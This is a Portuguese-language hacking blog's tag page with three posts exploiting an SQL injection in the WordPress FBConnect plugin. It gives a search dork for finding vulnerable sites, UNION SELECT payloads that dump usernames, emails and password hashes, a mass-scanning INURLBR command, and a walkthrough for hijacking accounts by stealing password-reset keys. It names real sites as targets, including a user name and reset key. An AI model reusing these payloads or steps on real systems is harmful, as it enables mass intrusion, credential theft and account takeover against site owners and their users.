Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador fbconnect_action. Mostrar todas as postagens
Mostrando postagens com marcador fbconnect_action. Mostrar todas as postagens

quinta-feira, 7 de maio de 2015

WordPress FBConnect SQL Injection Vulnerability + INURLBR VALIDATING HTML RETURN

[ + ] INURLBR 2.1
[ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN
[ + ] WORDPRESS:  Fbconnect
[ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1
[ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0
exec: fbconnect_action=myhome&fbuserid=1 + xpl

[ + ] INURLBR 2.1 [ + ] EXPLORING: SQLI AND VALIDATING HTML RETURN [ + ] WORDPRESS: Fbconnect [ + ] FILE VULN: fbconnect_action=myhome&fbuserid=1 [ + ] EXPLOIT: and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0 exec: fbconnect_action=myhome&fbuserid=1 + xpl


  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # EA:            http://www.exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil


[ + ] SEARCH DORK

--dork 'inurl:"?fbconnect_action="' 



---------------------------------------------------------------------------



[ + OUTPUT VULN

-s sqli.txt  



---------------------------------------------------------------------------



[ + ID SEARCH ENGINES 1 = GOOGLE + CSE, 6 GOOGLE API

-q 1,6 



---------------------------------------------------------------------------



[ + EXPLOIT GET

--exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0'



---------------------------------------------------------------------------



[ + TYPE INTERNAL VALIDATION

-t 2 



---------------------------------------------------------------------------



[ + SEARCH FOR CUSTOM VALUE

-a 'xpl_success' 



---------------------------------------------------------------------------



[ + FILTER HOSTS URL / MOD UNIQUE = HOST+XPL_GET

--unique



---------------------------------------------------------------------------



[ + ] CONVERTED VALUE

0x78706c5f73756363657373 = hex(xpl_success)



---------------------------------------------------------------------------



- We pass the value (hexdecimal)-'0x78706c5f73756363657373' in our sql injection.



Se a string 'xpl_success' aparecer no retorno html do nosso alvo, Significa que foi explorado com sucesso.

If the string 'xpl_success' appears on the html return of our target, it means that was successfully exploited.



Resumindo eu passo um valor pré-definido na minha injeção sql em formato hexdecimal no select ,caso tal valor retorne no formato string significa que foi executado com sucesso.
No tutorial converti a string xpl_success para hexadecimal que fica 78706c5f73756363657373, injeto no server ele executa e prita pro cliente.
No script INURLBR o parâmetro -t level 2 é pra ser validado com uma busca personalizada dentro do alvo, quando quero achar uma determinada string por isso usamos o comando -a complementando, -t 2 anula a busca de outros erros SQLI  e vai focar somente em nossa string passada através -a 'sua_string'.



if(HTML == xpl_success){ OK }





[ + ] COMMAND:

php inurlbrpriv8.php  --dork 'inurl:"?fbconnect_action="' -s sqli.txt -q 1,6 --exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0' -t 2 -a 'xpl_success' --unique



[ + ] VÍDEO:






DOWNLOAD SCANNER: 

https://github.com/googleinurl/SCANNER-INURLBR





REF

http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html

http://www.1337day.com/exploit/15790








By:



às





Um comentário:

























Marcadores:
,
,
,
,
,
,
,
,

















domingo, 6 de outubro de 2013













 EXPLOIT CMS WORDPRESS / FBCONNECT










/*

  ###################################################################

  EXPLOIT CMS WORDPRESS / FBCONNECT

  By: GoogleINURL

  REF:http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html

  REF:http://aurruz.com/post/1790/   

 DORK['1']:inurl:"/?fbconnect_action=myhome"

  ###################################################################

*/





  EXPLOIT CMS WORDPRESS / FBCONNECT



Modo de usar:



http://localhost/script.php?url=http://alvo.com.br/

http://localhost/script?url=http://boneramamusic.com/

http://localhost/script.php?url=http://alvo.com.br/compasta



Ao carregar pela primeira vez ele vai tentar exploitar aparecendo dados usuário,login,senha significar que está vull.



O passo seguinte é pedir uma nova senha com usuário que temos acesso.



Quando efetuar o pedido seria enviado uma KEY de ativação para o email do usuario, no qual a mesma KEY fica no BD do wordpress.



O envio concluido dé um refresh na pagina onde podemos observar que aparece alem de usuario & senha tem agora o USE_ACTIVATION_KEY



E uma URL já formata para trocar a senha do usuário.



http://boneramamusic.com/wp-login.php?action=rp&key=[USE_ACTIVATION_KEY]&login=[USER]



http://boneramamusic.com/wp-login.php?action=rp&key=smnw8z7n70mG0ubbT91j&login=Mark Mullins





SCRIPT: http://pastebin.com/CysgK2Zf



Porem creio que já foi corrigido essa falha, mas está aé o script para estudar e criar exploits futuros.








By:



às





Um comentário:

























Marcadores:
,
,
,
,

















segunda-feira, 30 de setembro de 2013













Exploit Wordpress fbconnect_action pei pei pei












Exploit Wordpress

Exploit Wordpress fbconnect_action pei pei pei



DORK['1']:inurl:"/?fbconnect_action=myhome"





http://VULL.COM/?fbconnect_action=myhome&userid=2[BUG-SQL]



EXPLOIT:

Mostrando user,email,senha(user_login,user_email,user_pass):

http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--





Com o email do usuário em mãos, vá até o painel de administrador.



http://VULL.COM/wp-login.php

"click em Lost your password ?"

É peça uma nova senha enviando para o e-mail.





Agora vamos consultar a KEY gerada pelo wordpress CAMPO:KEY=user_activa​



http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa​tion_key),7,8,9,10,11,12+from+wp_users--





Vamos modificar a senha do usuario com a KEY CAPTURADA



http://VULL.COM/wp-login.php?action=rp&key=[KEY]&login=[NOME_USUARIO]

USANDO:

http://VULL.COM/wp-login.php?action=rp&key=65465465AWDAD46546465464&login=MARIA



Pronto agora só trocar a senha do usuario e seja feliz Hackeiro hahahahahaahaha.





EXEMPLO:

http://www.artkernel.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--















By:



às




























Marcadores:
,
,
,























Assinar:
Postagens (Atom)